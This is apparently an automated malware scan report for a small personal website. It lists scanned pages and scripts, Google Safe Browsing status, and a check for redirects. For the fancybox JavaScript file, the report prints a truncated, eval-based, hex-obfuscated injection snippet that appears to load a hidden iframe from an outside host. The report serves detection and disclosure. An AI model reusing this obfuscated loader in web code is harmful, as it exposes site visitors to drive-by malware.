Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mwramsay.pwp.blueyonder.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mwramsay.pwp.blueyonder.co.uk/ | 200 OK Content-Length: 25296 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/./fancybox/lib/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1384 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/./fancybox/source/jquery.fancybox.js | 200 OK Content-Length: 4415 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6b_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6b_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_6b_74_77_7d_6c_36_71_7c_37_6f_60_40_4e_55_50_7a_54_36_78_70_78_2f_43_15_12_28_6b_78_36_7b_7c_81_74_6d_36 Antivirus reports:
| ||
http://www.mwramsay.pwp.blueyonder.co.uk/./fancybox/source/helpers/jquery.fancybox-buttons.js?v=2.0.4 | 200 OK Content-Length: 2860 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/./fancybox/source/helpers/jquery.fancybox-thumbs.js?v=2.0.4 | 200 OK Content-Length: 3651 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/SpryAssets/SpryValidationCheckbox.js | 200 OK Content-Length: 15980 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/Boomslang.php | 200 OK Content-Length: 31049 Content-Type: text/html | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/SpryAssets/SpryAccordion.js | 200 OK Content-Length: 15454 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/SpryAssets/SpryTabbedPanels.js | 200 OK Content-Length: 11357 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/SpryAssets/SpryURLUtils.js | 200 OK Content-Length: 4764 Content-Type: application/x-javascript | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/spec/boomslang-jv4sfl.htm | 200 OK Content-Length: 3252 Content-Type: text/html | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/test404page.js | 404 Not found Content-Length: 1000 Content-Type: text/html | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/./basses/boomslang-jv4sfl/boomslang-jv4sfl-01-b.jpg | 200 OK Content-Length: 268706 Content-Type: image/jpeg | clean |
http://www.mwramsay.pwp.blueyonder.co.uk/./basses/boomslang-jv4sfl/boomslang-jv4sfl-02-b.jpg | 200 OK Content-Length: 241736 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mwramsay.pwp.blueyonder.co.uk
Result:
GET / HTTP/1.1
Host: mwramsay.pwp.blueyonder.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mwramsay.pwp.blueyonder.co.uk
Referer: http://www.google.com/search?q=mwramsay.pwp.blueyonder.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mwramsay.pwp.blueyonder.co.uk
Referer: http://www.google.com/search?q=mwramsay.pwp.blueyonder.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.